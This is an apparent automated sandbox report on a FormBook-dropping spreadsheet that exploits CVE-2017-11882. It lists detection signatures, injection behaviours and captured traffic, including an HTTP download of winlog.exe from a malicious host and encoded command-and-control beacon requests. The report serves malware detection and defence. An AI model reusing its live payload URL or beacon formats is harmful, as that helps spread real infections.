Analysis Report PI202009255687.xlsx

Overview

General Information

Sample Name: PI202009255687.xlsx
Analysis ID: 323042
MD5: d7c0c12c1cdf36e9f97f96cb3fe16ae0
SHA1: e73e8bd48f5ef68747de444e44d59745cb75b08a
SHA256: 76b2d9b4655b8a349e1b5c7bf05ac5bb22bea988bc818e46756b17d7e22a37d1
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for domain / URL
Source: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 31%
Multi AV Scanner detection for submitted file
Source: PI202009255687.xlsx ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.2.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 6_2_0040E451
Source: C:\Windows\SysWOW64\wscript.exe Code function: 4x nop then pop edi 9_2_0007E451
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49168
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Thu, 26 Nov 2020 08:00:28 GMT
  Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
  Last-Modified: Wed, 25 Nov 2020 21:20:21 GMT
  ETag: "61800-5b4f4feb1ea84"
  Accept-Ranges: bytes
  Content-Length: 399360
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdownload
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
  GET /ogg/?Xrx4lx8=o9DTWGgejQhFb0XDNKFr8x252gLWlqtFw+u/IiN1z9p9QWzZEqjsrtg5rynyb3VCEFeW0g==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
  Host: www.lygosfilms.info
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected:
  GET /ogg/?Xrx4lx8=eztizZ8x7kSo9uOf28HhjptTcxlOOjaZfVOeHHhHD52pMpUKEpnrJtnkFIsv9WMMSpfKiA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
  Host: www.paletciniz.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected:
  GET /ogg/?Xrx4lx8=L5tkrd3+tAlV4v3imC1rTm4lbmURrJu8I1nhE3bKvhdVz9gPESQ8tOxzxkSNJHyX8NnBHA==&eny8V=8p-t_j0xRnOLT2 HTTP/1.1
  Host: www.annaothomas.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.138.53
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE
Source: Joe Sandbox View ASN Name: EGIHOSTINGUS
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
  GET /chnsfrnd2/winlog.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420BD973.emf
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: vbc.exe, 00000004.00000002.2178642047.0000000000910000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193008298.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  X-XSS-Protection: 1; mode=block
  X-Content-Type-Options: nosniff
  Content-Type: text/html; charset=UTF-8
  X-Cacheable: YES:Forced
  Transfer-Encoding: chunked
  Date: Thu, 26 Nov 2020 08:01:45 GMT
  Age: 0
  Connection: close
  Vary: User-Agent
  X-Cache: uncached
  X-Cache-Hit: MISS
  X-Backend: all_requests
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000008.00000000.2195288606.0000000004F30000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389538314.0000000001E80000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: vbc.exe, 00000004.00000002.2179124238.0000000000AF7000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2193231834.0000000003E27000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wscript.exe, 00000009.00000002.2390221557.0000000002F5F000.00000004.00000001.sdmp String found in binary or memory: http://wordpress.org
Source: explorer.exe, 00000008.00000000.2206193001.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2181497235.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2194316905.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000008.00000000.2206484946.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.google.pl/
